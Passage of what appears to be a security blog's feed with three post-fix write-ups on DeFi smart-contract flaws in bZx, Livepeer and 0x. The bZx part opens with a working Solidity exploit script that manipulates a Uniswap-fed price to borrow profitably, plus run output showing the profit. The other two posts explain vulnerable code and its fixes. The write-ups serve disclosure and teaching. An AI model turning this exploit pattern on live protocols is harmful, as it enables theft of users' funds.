        name("bzx-uniswap-exploit");
        blockNumber(8547500);
    }
    
    function run() public {
        begin("exploit")
            .withBalance(INITIAL_BALANCE)
            .first(this.checkRates)
            .then(this.makeOrder)
            .then(this.checkRates)
            .then(this.borrow)
            .then(this.cleanup)
            .finally(this.checkProfits);
    }
    
    uint constant rateCheckAmount = 10 ether;
    
    function checkRates() external {
        (uint rate, uint slippage) = KYBER_NETWORK.getExpectedRate(REP, KYBER_ETH, rateCheckAmount);
        printf("checking rates tokens=%.18u rate=%.18u slippage=%.18u\n", abi.encode(rateCheckAmount, rate, slippage));
    }
    
    function makeOrder() external {
        UniswapLike uniswap = REP.getUniswapExchange();
        uint totalSupply = REP.balanceOf(address(uniswap));
        uint borrowAmount = totalSupply * 90 / 100;
        REP.getFromUniswap(borrowAmount);
        printf("making order totalSupply=%.18u borrowed=%.18u\n", abi.encode(totalSupply, borrowAmount));
    }
    
    function borrow() external {
        bytes32 hash = doBorrow(BZX_ETH, true, BZX_ETH.marketLiquidity(), WETH, REP);
        printf("borrowing loanHash=%32x\n", abi.encode(hash));
    }
    
    function cleanup() external {
        REP.giveAllToUniswap();
        WETH.withdrawAll();
    }
    
    function checkProfits() external {
        printf("profits=%.18u\n", abi.encode(address(this).balance - INITIAL_BALANCE));
    }
    
    function borrowInterest(uint amount) internal {
        WETH.deposit.value(amount)();
    }
}

/*
### running script "bzx-uniswap-exploit" at block 8547500
#### executing step: exploit
##### calling: checkRates()
checking rates tokens=10.000000000000000000 rate=0.057621091203633720 slippage=0.055892458467524708
##### calling: makeOrder()
making order totalSupply=8856.102959786215028808 borrowed=7970.492663807593525927
##### calling: checkRates()
checking rates tokens=10.000000000000000000 rate=5.656379870360426078 slippage=5.486688474249613295
##### calling: borrow()
collateral_required=702.265284613341236862, interest_required=205.433213643594588344
borrowing loanHash=0x947839881794b73d61a0a27ecdbe8213f543bdd4f4a578eedb5e1be57221109c
##### calling: cleanup()
##### calling: checkProfits()
profits=2425.711777227580307468
#### finished executing step: exploit
*/

Solution

The bZx team reverted their changes for the previous attack and instead implemented a spread check, such that if the spread was above a certain threshold then the loan would be rejected. This solution handles the generic case so long as both tokens being queried has at least one non-manipulable reserve on Kyber, which is currently the case for all whitelisted tokens.

Key Takeaways

Don't use an on-chain decentralized oracle without some sort of validation

Due to the nature of on-chain decentralized oracles, ensure that you're validating the rate being returned, whether it's by taking the order (thereby nullifying any gains which may have been realized), comparing the rate against known good rates (in the case of DAI), or comparing the rate in both directions.

Consider the implications of dependencies on third-party projects

In both cases, DDEX and bZx assumed that Uniswap and Kyber would be a source of accurate price data. However, an accurate rate for a DEX means that a trade can be made using that rate, while an accurate rate for a DeFi project means that it is close to or equal to the FMV. In other words, an accurate rate for a DeFi project is an accurate rate for a DEX, but the opposite might not be true.

Furthermore, bZx's second attempt at solving this problem was insufficient due to a misunderstanding in how the Kyber Network internally calculates the exchange rate between two non-ETH tokens.

As such, before introducing a dependency on a third-party project, consider not only whether the project has been audited, but also whether the project's specifications and threat model align with your own. If you have the time, taking an in-depth look at their contracts also doesn't hurt.

Further Reading

]]>
<![CDATA[The Livepeer slashing vulnerability]]>https://samczsun.com/the-livepeer-slashing-vulnerability/5d3f25a0dcad17000113946eTue, 30 Jul 2019 02:44:29 GMTtl;dr

Improper input validation meant that the same claim could be submitted twice as proof of transcoder double claiming. This would have resulted in loss of funds as well as denial of service of the Livepeer network.

What is Livepeer?

Livepeer is a platform for streaming live video over the internet. One of the ways it facilitates this is by operating a marketplace where GPU time for transcoding videos can be bought and sold.

This marketplace roughly works as follows. Transcoders who want to sell their GPU time must stake Livepeer Tokens (LPT) and/or have others stake LPT tokens for them. If they're in the list of top 25 transcoders by tokens staked, then they're eligible to receive work through the marketplace.

When a broadcaster wants to buy GPU time to transcode a video, they submit a job through the smart contract system. An active transcoder is randomly matched with this job, and the broadcaster can coordinate with the selected transcoder off-chain.

The broadcaster breaks down the video they want transcoded into small chunks, called segments. As the transcoder receives segments, they must record on-chain that they've begun work on those segments by submitting a claim. Each claim can only contain sequential segments, and certain segments are randomly subjected to further verification by the Livepeer network.

In order to ensure that malicious transcoders are held accountable, any third party can slash transcoders if certain conditions are met. If a transcoder is slashed, a portion of their staked tokens will be burnt, and they'll be removed from the list of active transcoders.

Currently, transcoders may be slashed if they meet one of these two conditions

  1. The transcoder does not submit the necessary verification for a segment
  2. The transcoder submitted two claims for the same segment

The Vulnerability

Here's the code which determines whether a transcoder can be slashed for double claiming a segment.

function doubleClaimSegmentSlash(
 uint256 _jobId,
 uint256 _claimId1,
 uint256 _claimId2,
 uint256 _segmentNumber
) /* snip */ {
    Job storage job = jobs[_jobId];
    Claim storage claim1 = job.claims[_claimId1];
    Claim storage claim2 = job.claims[_claimId2];

    // Claim 1 must not be slashed
    require(claim1.status != ClaimStatus.Slashed);
    // Claim 2 must not be slashed
    require(claim2.status != ClaimStatus.Slashed);
    // Segment must be in claim 1 segment range
    require(_segmentNumber >= claim1.segmentRange[0] && _segmentNumber <= claim1.segmentRange[1]);
    // Segment must be in claim 2 segment range
    require(_segmentNumber >= claim2.segmentRange[0] && _segmentNumber <= claim2.segmentRange[1]);

    // Slash transcoder and provide finder params
    bondingManager().slashTranscoder(job.transcoderAddress, msg.sender, doubleClaimSegmentSlashAmount, finderFee);
     
    refundBroadcaster(_jobId);

    // Set claim 1 as slashed
    claim1.status = ClaimStatus.Slashed;
    // Set claim 2 as slashed
    claim2.status = ClaimStatus.Slashed;
 }
Source

At first glance, this code looks perfectly fine. Both claims must be valid, and the supposedly double-claimed segment must be included in both claims. While it's unfortunate that the Checks-Effects-Interaction pattern isn't used, there's no risk of re-entrancy by bondingManager.

However, the function does not check that the two specified claims are distinct. This means that any claim of any segment is eligible to be slashed just by calling doubleClaimSegmentSlash with the same claim ID.

The Solution

Here's the one (two if you count comments) line solution, presented in all its glory.

// The provided claims must be different (i.e different IDs)
require(_claimId1 != _claimId2);
Source

The Impact

When a transcoder is slashed for double claiming, 3% of their staked LPT is deducted as penalty, with 5% of the penalty going to the finder and the remaining 95% burned. Furthermore, the transcoder is removed from the pool of active transcoders.

This means that for the top transcoder, who has staked ~1,100,000LPT, a mere 10 false slashes would bring their stake down to ~800,000LPT. Another 40 false slashes (for a total of 50) would result in a meager ~240,000LPT still staked.

Given that the attacker has the history of the entire world to play with, and can also manipulate transcoders into doing legitimate work by submitting jobs, this scenario is not entirely unrealistic. Furthermore, through the finder's fee the attacker would have netted 5% of the penalized LPT, resulting in a cool ~43,000LPT (~1500ETH) for their troubles.

Key Takeaways

Consider the assumptions made and ensure that they are true

When writing code, assumptions about what sorts of input will be received are made. As the developer works on the code and becomes more and more familiar with it, it's all too easy to fall into the trap of believing that these assumptions are etched into stone.

As such, when it comes time to write unit tests (or, even when just reviewing code), it's a good idea to list out the assumptions that were made and check whether they are really true, or just assumed to be true. In this case the assumption that both claim IDs would be distinct was made, but not enforced.

Have a response plan

Audited code does not equate to secure code, and as such response plans should always be developed in case a situation like this one arises. Due in part to having responded to security incidents before, the Livepeer team was able to quickly triage and resolve this problem. This was aided by their modular contract layout, which allowed them to pause and upgrade implementations as needed.

Further Reading

]]>
<![CDATA[The 0x vulnerability, explained]]>https://samczsun.com/the-0x-vulnerability-explained/5d2a7747c57ea20001c67de7Sun, 14 Jul 2019 02:28:27 GMTOn Friday July 12th, 0x shut down their v2 Exchange because a flaw in the signature verification routine meant that a signature of 0x04 was treated as a valid signature for all non-smart-contract accounts. This blog post explains how this is possible.

Background

0x is, when grossly oversimplified, a platform which allows users to trade with other users. If Alice wants to buy 1000 ZRX for 1 ETH, Alice can submit an order through the 0x protocol. If Bob then decides that he wants to take Alice's order, he can use 0x's Exchange contract to securely perform the exchange.

In order for the Exchange to make sure that Alice really did make the offer that Bob claims she's making, Bob needs to submit Alice's signature with the order data. This signature is the only thing preventing Bob from claiming that Alice is offering 1000000 ZRX for 1 wei, so it's imperative that signatures can't be forged.

0x supports several types of signatures. EIP712 and EthSign signatures are based on ECDSA signatures and are cryptographically secure, while Wallet and Validator signatures query an address for the validity of the provided signature. The Wallet signature in particular will query the sender address, and is intended to allow multi-signature wallets to make trades.

The Code

Let's take a look at how 0x verifies a Wallet signature.

function isValidWalletSignature(
    bytes32 hash,
    address walletAddress,
    bytes signature
)
    internal
    view
    returns (bool isValid)
{
    bytes memory calldata = abi.encodeWithSelector(
        IWallet(walletAddress).isValidSignature.selector,
        hash,
        signature
    );
    assembly {
        let cdStart := add(calldata, 32)
        let success := staticcall(
            gas,              // forward all gas
            walletAddress,    // address of Wallet contract
            cdStart,          // pointer to start of input
            mload(calldata),  // length of input
            cdStart,          // write output over input
            32                // output size is 32 bytes
        )

        switch success
        case 0 {
            // Revert with `Error("WALLET_ERROR")`
            /* snip */
            revert(0, 100)
        }
        case 1 {
            // Signature is valid if call did not revert and returned true
            isValid := mload(cdStart)
        }
    }
    return isValid;
}
Source

If we ignore the fact that this was written in inline assembly, it's fairly straightforward. First, lines 10-14 construct the ABI-encoded data which will be sent to the wallet. Lines 17-24 perform the call to the wallet. Finally, lines 26-34 check whether the call succeeded, and load the returned boolean.

The Problem

While the code to validate a Wallet signature was simple enough, it was written without knowledge of at least one of these two subtleties of the EVM:

1. Executing instructions outside the code is equivalent to executing STOP instructions

In most modern computers, executing undefined instructions means that your computer will execute garbage until the program crashes. However, the EVM is special because if execution happens to go outside the code of the smart contract, it's implicitly treated as a STOP instruction.

Section 9.4

A side effect of this is that accounts with no code can still be executed - they'll just immediately halt.

2. While the CALL family of instructions allow specifying where the output should be copied, the output area is not cleared beforehand

Take a look at this excerpt from the formal definition of the CALL instruction, where µ[5] is where in memory the return data should be copied, µ[6] is the length of the return data to be copied, and o is the data returned by the CALL instruction.

Appendix H

This states that only n bytes will be copied from the returned data to main memory, where n is the minimum of the number of bytes expected and the number of bytes returned. This implies that if less bytes are returned than expected, only the number of bytes returned will be copied to memory.

Going back to the validation routine, the authors instructed the EVM to overwrite the input data with the returned data, likely to save gas. Under normal operation, given a hash of 0xAA...AA and a signature of 0x1CFF...FF, the memory before and after a call might look something like this.

Before
After

However, if there was no data returned by the call, then the memory after the call would look like this:

After

In other words, the memory is unchanged. Now, when the code on line 33 loads the first 32 bytes into a boolean variable, the nonzero value is coerced into true. Then, this true is returned from the function, indicating that "yes, the signature provided is fine" when it clearly isn't.

As for why the magic signature of 0x04 is always considered valid, it's because 0x04 is the ID number for a Wallet type signature, and the signature type is the last byte in the signature array.

// Allowed signature types.
enum SignatureType {
    Illegal,         // 0x00, default value
    Invalid,         // 0x01
    EIP712,          // 0x02
    EthSign,         // 0x03
    Wallet,          // 0x04
    Validator,       // 0x05
    PreSigned,       // 0x06
    NSignatureTypes  // 0x07, number of signature types. Always leave at end.
}
Source
function isValidSignature(
    bytes32 hash,
    address signerAddress,
    bytes memory signature
)
    public
    view
    returns (bool isValid)
{
    /* snip */

    // Pop last byte off of signature byte array.
    uint8 signatureTypeRaw = uint8(signature.popLastByte());
    
    /* snip */

    SignatureType signatureType = SignatureType(signatureTypeRaw);
    
    /* snip */
    if (signatureType == SignatureType.Wallet) {
        isValid = isValidWalletSignature(
            hash,
            signerAddress,
            signature
        );
        return isValid;
    }
    /* snip */
}
Source

The Solution

To their credit, 0x triaged and fixed this vulnerability in a couple of hours. The relevant commit can be viewed here, but there's really only two sections of interest.

The first change requires that the wallet address contains some code. This behavior matches what the Solidity compiler inserts before performing a function call.

if iszero(extcodesize(walletAddress)) {
    // Revert with `Error("WALLET_ERROR")`
    /* snip */
    revert(0, 100)
}

The second change requires the return data to be exactly 32 bytes long. This is also what the Solidity compiler inserts after performing a function call.

if iszero(eq(returndatasize(), 32)) {
    // Revert with `Error("WALLET_ERROR")`
    /* snip */
    revert(0, 100)
}

Conclusion

This isn't the first time that an EVM subtlety has bitten a smart contract developer, and it won't be the last. However, it's usually through incidents like this that we all learn about a new dangerous pattern to watch out for. Hopefully through this incident, future developers and auditors will be able to catch similar problems before they make it to mainnet.

Further Reading

]]>